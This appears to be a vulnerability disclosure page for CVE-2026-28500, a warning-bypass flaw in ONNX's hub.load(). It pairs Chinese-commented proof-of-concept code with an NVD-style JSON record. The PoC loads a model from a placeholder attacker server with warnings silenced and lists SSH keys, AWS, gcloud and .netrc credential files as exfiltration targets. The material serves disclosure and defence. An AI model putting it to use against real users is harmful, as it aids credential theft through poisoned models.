CVE-2026-28500

import onnx import os # 恶意模型构造示例（概念验证） # 攻击者可以通过以下方式利用此漏洞 # PoC 1: 加载恶意模型（silent=True绕过警告） try: # 攻击者托管的恶意模型URL或本地路径 malicious_model_path = "http://attacker-server/malicious_model.onnx" # silent=True完全压制安全警告，这是漏洞的核心 model = onnx.hub.load( repo_or_file=malicious_model_path, model_name="malicious_model", silent=True # 绕过所有安全警告 ) print("Model loaded successfully (attack executed)") except Exception as e: print(f"Error: {e}") # PoC 2: 模拟恶意模型加载后的文件外泄 def exfiltrate_sensitive_files(): """ 模拟攻击者利用漏洞窃取敏感文件 实际攻击中这些操作会被嵌入到恶意ONNX模型加载逻辑中 """ sensitive_paths = [ os.path.expanduser("~/.ssh/id_rsa"), os.path.expanduser("~/.ssh/id_ed25519"), os.path.expanduser("~/.aws/credentials"), os.path.expanduser("~/.config/gcloud/application_default_credentials.json"), os.path.expanduser("~/.netrc"), ] for path in sensitive_paths: if os.path.exists(path): print(f"[ATTACK] Found sensitive file: {path}") # 实际攻击中会读取文件内容并外传 # PoC 3: 检测漏洞存在性 def check_vulnerability(): """ 检测当前ONNX版本是否存在silent参数绕过漏洞 """ import inspect from onnx import hub load_signature = inspect.signature(hub.load) if 'silent' in load_signature.parameters: print("[VULN] silent parameter exists - vulnerable to CVE-2026-28500") return True return False

{"cve": {"id": "CVE-2026-28500", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:24.227", "lastModified": "2026-03-18T19:47:59.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine the moment the model is loaded. As of time of publication, no known patched versions are available."}, {"lang": "es", "value": "Open Neural Network Exchange (ONNX) es un estándar abierto para la interoperabilidad de aprendizaje automático. En versiones hasta la 1.20.1 inclusive, existe un bypass de control de seguridad en onnx.hub.load() debido a una lógica incorrecta en el mecanismo de verificación de confianza del repositorio. Aunque la función está diseñada para advertir a los usuarios al cargar modelos de fuentes no oficiales, el uso del parámetro silent=True suprime completamente todas las advertencias de seguridad y las solicitudes de confirmación. Esta vulnerabilidad transforma una función estándar de carga de modelos en un vector para ataques de cadena de suministro de interacción cero. Cuando se encadena con vulnerabilidades del sistema de archivos, un atacante puede exfiltrar silenciosamente archivos sensibles (claves SSH, credenciales de la nube) de la máquina de la víctima en el momento en que se carga el modelo. Al momento de la publicación, no hay versiones parcheadas conocidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-494"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:onnx:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.20.1", "matchCriteriaId": "34920498-08A0-464E-B9F2-1562D29E3F26"}]}]}], "references": [{"url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Patch"]}]}}